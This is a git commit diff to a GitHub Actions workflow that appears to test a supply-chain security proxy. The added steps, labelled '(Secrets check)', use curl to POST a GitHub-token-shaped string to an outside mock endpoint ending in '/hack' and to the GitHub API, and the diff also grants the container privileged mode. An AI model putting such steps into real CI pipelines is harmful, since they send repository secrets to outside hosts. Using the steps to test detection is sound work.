Update main.yml

parasole1 · web-flow · commit d4f7d7477bef · 2025-02-20T10:24:24.000+05:45
diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml
@@ -1,15 +1,13 @@
-name: Build NPM Package
-
+name: Build JS Package For Secrets
 on:
-  workflow_dispatch: # This line allows the workflow to be triggered manually
+  workflow_dispatch:
 
 permissions:
   checks: write
-  contents: write
+  contents: read
   packages: read
-
 env:
-  API_URL: https://app.invisirisk.com
+  API_URL: https://app.veribom.com
 
 jobs:
   create_scan_in_IR_Portal:
@@ -27,7 +25,6 @@ jobs:
       - name: Parse Response
         id: parseResponse
         run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT"
-
   ecr_details:
     runs-on: ubuntu-latest
     outputs:
@@ -40,8 +37,8 @@ jobs:
         id: fetchECRDetails
         uses: fjogeleit/http-request-action@v1.15.1
         with:
-          url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}'
-          method: 'GET'
+            url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}'
+            method: 'GET'
       - name: Decoding VB Token
         id: parseToken
         run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT"
@@ -52,7 +49,7 @@ jobs:
           echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT"
           echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT"
           echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT"
-
+          
   start_proxy_and_build:
     runs-on: ubuntu-latest
     needs: [create_scan_in_IR_Portal, ecr_details]
@@ -62,63 +59,52 @@ jobs:
         credentials:
           username: ${{needs.ecr_details.outputs.ecr_username}}
           password: ${{needs.ecr_details.outputs.ecr_token}}
-    env:
-      PSE_DEBUG_FLAG: --alsologtostderr
-      POLICY_LOG: t
-      INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}}
-      INVISIRISK_PORTAL: https://app.invisirisk.com/
-      GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        env:
+          PSE_DEBUG_FLAG: --alsologtostderr
+          POLICY_LOG: t
+          INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}}
+          INVISIRISK_PORTAL: https://app.veribom.com/
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 
     container:
-      image: node:18-alpine
-      options: --cap-add=NET_ADMIN
+      image: node:18-buster
+      options: --cap-add=NET_ADMIN --privileged
     strategy:
       matrix:
         node-version: [18.x]
     steps:
-      - name: Print Scan ID
-        env: 
-          SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }}
-        run: echo $SCAN_ID
-
-      - name: PSE Action
-        uses: invisirisk/pse-action@v1.0.8
-        with:
+    - name: Install curl
+      run: |
+        apt-get update
+        apt-get install -y curl
+      
+    - env: 
+        SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }}
+      run: echo $SCAN_ID
+    - uses: invisirisk/pse-action@v1.0.8
+      with:
           github-token: ${{ secrets.GITHUB_TOKEN }}
           SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }}
+    - name: Checkout the code
+      uses: actions/checkout@v3
+    - name: Use Node.js ${{ matrix.node-version }}
+      uses: actions/setup-node@v3
+      with:
+        node-version: ${{ matrix.node-version }}
 
-      - name: Checkout code
-        uses: actions/checkout@v3
-        with:
-          fetch-depth: 0
-          token: ${{ secrets.GITHUB_TOKEN }}
-
-      - name: Configure Git
-        run: |
-          git config --global --add safe.directory "${GITHUB_WORKSPACE}"
-          git config --global user.name "GitHub Actions"
-          git config --global user.email "github-actions[bot]@users.noreply.github.com"
-
-      - name: Setup Node.js
-        uses: actions/setup-node@v3
-        with:
-          node-version: ${{ matrix.node-version }}
-
-      - name: Install dependencies
-        run: |
-          npm install
-          npm ci
-
-      - name: Build and test
-        run: |
-          npm run build --if-present
-          npm test
-
-      - name: Commit and push changes
-        run: |
-          if [[ -n "$(git status --porcelain)" ]]; then
-            git add .
-            git commit -m "chore: automated build and test updates [skip ci]"
-            git push https://${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git HEAD:${{ github.ref }}
-          else
-            echo "No changes to commit"
-          fi
+    - name: (Secrets check) Send POST request with GitHub token
+      run: |
+          curl -k -X POST https://vbirmock.free.beeceptor.com/hack \
+            -H "Content-Type: application/json" \
+            -d '{
+            "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
+          }'
+    - name: (Secrets check) Make API Request
+      run: |
+        curl -k -X POST https://api.github.com/endpoint \
+        -d '{"name": "ghp_1234567890abcdef1234567890abcdef12345678", "description": "A description of my repository"}'
+        
+    - name: install dependencies
+   # run: pip install -r requirements.txt
+      run: npm install
+    # - run: npm run build --if-present
+    # - run: npm test
